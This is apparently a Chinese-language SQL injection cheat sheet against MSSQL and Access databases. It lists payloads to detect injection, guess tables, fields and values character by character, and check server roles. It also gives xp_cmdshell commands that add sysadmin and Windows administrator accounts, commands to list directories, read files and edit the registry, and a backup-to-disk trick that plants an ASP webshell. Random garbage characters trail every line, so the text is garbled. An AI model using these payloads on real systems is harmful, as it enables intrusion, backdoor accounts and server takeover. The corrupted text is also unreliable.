1.判断是否有注入;and 1=1 ;and 1=2 >�" 8�j{�s
2.初步判断是否是mssql ;and user>0 e�:�D9;`C�
$�GK�m�`I"
3.注入参数是字符'and [查询条件] and ''=' e�<wj5:M|�
+s 0�Bt '�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ��u5|e9(J�
4��9kia!FR
5.判断数据库系统 !��oRm.c�O
lNPb�U ~�k
;and (select count(*) from sysobjects)>0 mssql .
�zMM86�c
7I�3CPc�$
;and (select count(*) from msysobjects)>0 access �M|]�1}8d?
8�$olP�:d
�H/I`c>Zn�
x�R%a�yT�.
6.猜数据库 ;and (select Count(*) from [数据库名])>0 =��"e�um7�
]ZATER)j�q
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 JF=�ABJ�=�
&�H>dE]Hq,
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ��I,uu>-�
c&W.sl��E6
9.(1)猜字段的ascii值(access) D�LM9o3/*J
8-l�Y6M\R\
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 51'SA
B09�
q�%&7J<���
(2)猜字段的ascii值(mssql) �_��cs9�R%
\r9�%;?��f
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 Q�Q8W�;x
b��:&$x (|
10.测试权限结构(mssql) V�1U[p3J-S
{j@)sD�M�X
�?b$zuJ]��
BC[d={�_-�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- N��Ut�yUv
�~n
9DG�>a
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- T+"y�8#��:
E�qlu�xD=
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �1/B�Ms0 =
n�U *fne?�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- `3n*�4L�z�
G* ��6<�pp
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- SX,�z�J�`"
��LK5�H~FK
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- a�]�[Z�;g�
��:*�nBo�
;and 1=(select IS_MEMBER('db_owner'));-- *s4!;2ZhsU
=^M t�#h."
j�06oAer 9
I]��$d,N!.
11.添加mssql和系统的帐户 jYZWf �`X~
���v�w;���
;exec master.dbo.sp_addlogin username;-- >u2�#<k]1&
;exec master.dbo.sp_password null,username,password;-- @�S92D���6
���Wc�G&W>
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �+�yI^<�BH
8PS:�yBkA|
;exec master.dbo.xp_cmdshell 'net user username password O+J�;Hp;\_
0G��Vok$r@
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �v�[�
'5�X
JwczE9~�o�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ?@(H.
D6'v
u����K5Px!
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- h���j1�j�Y
�::`���wx@
�0�E[�Se|!
v�a;w�Q~&�
12.(1)遍历目录 qZ����}XjL
�N|LVLs�K
;create table dirs(paths varchar(100), id int) .>��&fw��G
".ZiR7Z:$Y
;insert dirs exec master.dbo.xp_dirtree 'c:\' uoHhp��4>^
vsR ^aVwVZ
;and (select top 1 paths from dirs)>0 YPEd
XU8�}
U:e9Vq'N m
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) b2%[9)�"I.
h�`j�� �gF
Q�d?P[x��m
�0^z$C�OCv
(2)遍历目录 uy{KV"%"^g
jwox?]�f+�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ,��&SJ?XAs
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 G�#v7-&Yl6
��e{:qW'%�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �S8,0��6/#
I���Smn�Z@
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 <��,C}�)H?
B�)dynGF8i
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ���2��ZeL�
D
]�eF3a.G
LsV"h��<��
|_*1/W�z@�
13.mssql中的存储过程 uBgHt�jmae
R�I;RE�/�Z
xp_regenumvalues 注册表根键, 子键 ,Pm/ci(�s�
}tPl�?P'�`
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ZP<�X#]$qb
CcTJC�uOS�
xp_regread 根键,子键,键值名 s_TM!LRUcw
)f�rt��vN7
;exec xp_regread �T�W�0^wSm
�KK?~i[aL
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 9Ba<'wk/>"
!%@{S8IP.v
xp_regwrite 根键,子键, 值名, 值类型, 值 ("� %yV_R�
~/%){t/uLY
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �m�UbaR���
)%7A�. UO)
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 enj2xye%Y�
%�9���.�KH
xp_regdeletevalue 根键,子键,值名 ez>@'�yhK
�RT>3\qhZ�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 !@���X��#{
�o_n.,=/cZ
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 y����w�0uF
HA�pP*1J^c
w�[ngkLEA�
�5;l_�-0�=
14.mssql的backup创建webshell ^-_!�:7TH]
(XH)1 -Z!�
use model f@mM��&e=f
�{UN�z UaE
create table cmd(str image); \�ck3y]a[
Lz�fLCGA^
insert into cmd(str) values (''); �=`U[{�3A_
/[�L:ol6;!
backup database model to disk='c:\l.asp'; .�8m)^E��T
�:\�Z0��^{
{6�5X�37W
o6R(BMwG�a
15.mssql内置函数 A��UK��7a
M�i�/_hzZ\
;and (select @@version)>0 获得Windows的版本号 �)C@,m��gh
N��vi14,q/
;and user_name()='dbo' 判断当前系统的连接用户是不是sa 4��C:Y�EX~
Yq_z�lxd%F
;and (select user_name())>0 爆当前系统的连接用户 ~gc)Ww0(Q�
�{~"=6iyj�
;and (select db_name())>0 得到当前连接的数据库 oCr�����n�
+l9avy+P�(
"n:�9Jq�Pb
f���omkwN�
16.简洁的webshell v\�c3=DbO�
:FSkXe2yy0
use model ��`�dK\VK^
AN�;�?`AM;
create table cmd(str image); �W��A/\��x
B�hjX�Nf9[
insert into cmd(str) values (''); ^:0?R/A�
]V�sze4>Z[
backup database model to disk='g:\wwwtest\l.asp';
